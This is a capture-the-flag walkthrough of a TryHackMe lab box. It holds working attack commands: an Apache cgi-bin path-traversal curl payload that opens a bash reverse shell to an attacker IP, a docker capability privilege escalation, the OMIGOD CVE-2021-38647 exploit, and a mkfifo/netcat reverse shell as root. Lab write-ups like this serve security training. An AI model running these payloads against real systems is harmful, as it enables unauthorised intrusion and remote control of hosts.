Tryhackme: OhMyWeb Walkthrough
This is a medium level box with some very famous vulnerabilities of 2021. Upon initial exploitation, we will endup in a docker container where we will find the user flag. We then breakout of the docker container to get to the root flag.
Link to the box: Oh My WebServer
Enumeration
I do a quick nmap scan and there are only 2 services running.
nmap -sV -sC -T4 -vv -Pn -oN nmap_quick 10.10.58.139
Opening the IP address in the browser takes us to the following site. I tried messing around the text boxes in the site, and nothing interesting was found.
Enumerating the directories using ffuf, the cgi-bin/ directory gave the possible clue for the exploit.
Enumerating directories
ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://10.10.58.139:445/FUZZ
Exploit
By looking at the Apache version, I got to know it is vulnerable to the Apache path traversal vulnerability.
I ran the following to confirm the vulnerability.
Now, to get the reverse shell, I started a netcat listener, and ran the following:
curl -v 'http://10.10.219.238/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/bash' -d 'echo Content-Type: text/plain; echo; bash -i >& /dev/tcp/10.13.32.76/4444 0>&1' -H "Content-Type: text/plain"
I stabilized the reverse shell, and started looking around.
Looks like we are inside a docker container.
Next to elevate our privileges inside the container, I found the way when I listed the enabled capabilities. I use this to get root on the docker.
Note: we are not the root on the actual machine yet, this is just the docker container.
getcap -r / 2>/dev/null
Searching inside the docker container, I found the user flag.
find / -type f -name “user.txt” 2>/dev/null
cat /root/user.txt
Escalation
We need to break out of the docker container to find the root flag. When I ran the ifconfig, I came across the local IPs we can enumerate and exploit.
First, we need the static-binaries for the enumeration.
You can get the static binaries here: https://github.com/andrew-d/static-binaries/tree/master/binaries/linux/x86_64
I uploaded the static binaries using the simple python http server trick.
Note: On the docker, there is no wget, hence we have to use curl to upload the binaries.
curl -v http://<target_ip>/nmap -o nmap
After uploading, I make the binary executable
chmod +x ./nmapUpon scanning a small IP address range, I find the interesting IP address I can try to exploit.
./nmap 172.17.0.0–5
Some more enumeration on the IP address using nmap:
./nmap -p- --min/rate 5000 172.17.0.1
We see 4 services running on this IP.
Searching around exploits for port 5986, I came across a lot of WinRM stuff. But none of them seem interesting here, and then I came across omi god vulnerability (CVE-2021-38647).
The exploit is a simple python file, which you can download from here:
https://github.com/AlteredSecurity/CVE-2021-38647/blob/main/CVE-2021-38647.py
I downloaded it to my attack machine, and then uploaded it to the docker container.
Once the exploit is uploaded, running it is simple and I got the root flag.
Bonus — revese shell as root from the actual machine
There is a netcat binary ‘nc’ on the machine, which we can use to get another reverse shell as a root user from the actual machine.
I setup another netcat listener on port 1111 on my attack machine, and I run the command
python3.7 omi.py -t 172.17.0.1 -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.13.32.76 1111 >/tmp/f'Now, I have the reverse shell as root from the actual machine :)
